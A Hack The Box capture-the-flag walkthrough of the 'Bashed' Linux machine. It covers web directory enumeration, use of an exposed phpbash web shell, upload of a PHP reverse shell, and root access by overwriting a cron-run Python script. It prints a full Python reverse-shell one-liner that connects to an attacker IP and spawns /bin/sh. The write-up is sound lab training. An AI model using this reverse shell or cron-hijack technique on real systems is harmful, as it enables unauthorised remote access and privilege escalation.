BASHED - HTB Writeup

chandan kumar
4 min readJan 3, 2021

Type:Linux

IP: 10.10.10.68

Bashed is a fairly straightforward box. Let’s start the walkthrough with basic enumeration!

Nmap scan: the only service of interest is the web server on port 80.

Let's now head over to http://10.10.10.68 (HTTP on port 80).

Nothing of interest in the page source or elsewhere on the landing page; it is a demo page for phpbash. Click on the arrow to follow the link.

Click on https://github.com/Arrexel/phpbash — the project page explains what phpbash is: a single-file PHP web shell that gives a semi-interactive terminal in the browser.

https://blog.sucuri.net/2020/09/phpbash-terminal-editor-web-shell.html — You can also visit this blog for better understanding.

The GitHub page suggests the shell lives under an uploads directory, but as the screenshot shows, that path does not open on this box.

10.10.10.68/uploads/phpbash.php — does not work.

So do a directory search with dirbuster.

Tried 10.10.10.68/sendMail.php as well, but that does not work either.

The .js files are not important for our purposes.

Looking in /dev/, we find phpbash.php and phpbash.min.php.

Info: this /dev/ is a directory on the web server (the developer's working copy of phpbash, left reachable from the web root), not the Linux /dev directory that holds the special device files.

Open either of the .php files and we get a very convenient shell as www-data.

Do a cat /etc/passwd — you can see the users and other details.

ls /home shows there are two users: arrexel and scriptmanager. The user flag is in /home/arrexel.

First flag found. Now look for the root flag.

Check sudo permissions with sudo -l.

We can run commands as the user scriptmanager without a password.

On other boxes we have uploaded a reverse shell through an upload form and caught it with netcat. Here there is no upload form, but the uploads directory exists, so check it first: nothing there. Since we already run as www-data inside phpbash, if we can write a malicious file into the web root our job is half done. So check the web server's directory, /var/www/html/uploads, and try to fetch the file into it. curl did not work from the phpbash shell; wget did.

INFO: https://www.pythonforbeginners.com/modules-in-python/how-to-use-simplehttpserver — serve the file from the attacker box with Python's SimpleHTTPServer.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php — change only the IP and the port you want to listen on.

VICTIM SYSTEM

Browse to the uploaded file and catch the connection with netcat.

There is no tty in this shell, so upgrade it to a proper pty first.

After upgrading, switch to scriptmanager with sudo and see there is a /scripts folder. Explore it.

It has two files, test.py and test.txt. The interesting part is that test.txt is owned by root.

Check the timestamp on test.txt: it is rewritten at a regular interval, which means a cron job is running.

test.py writes test.txt, and the resulting test.txt is owned by root, so the cron job must be running test.py as root. If we can replace test.py with our own script, whatever it does runs as root, because only the process that writes the output file (root) matters here.

Info: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet — you can use any reverse shell from the cheat sheet, but I will go with Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Put the Python code (everything between the single quotes) in a file with your IP and port, then download that file onto the box.

victim machine

Name the file test.py, overwriting the original, and start netcat listening on your port.

When the cron job next fires, the callback arrives and you are root. Ignore the nc -lnvp 4444 that appears after the root prompt in the screenshot.

cat /root/root.txt — and find the flag.

Learning:

  1. SimpleHTTPServer in depth.
  2. The /dev folder on the web server.
  3. More about privilege escalation.
  4. Some tricky parts in scripts.


chandan kumar

Threat Hunting, Detection Engineering, and Incident Response | Threat Researcher | DFIR |Threat Intel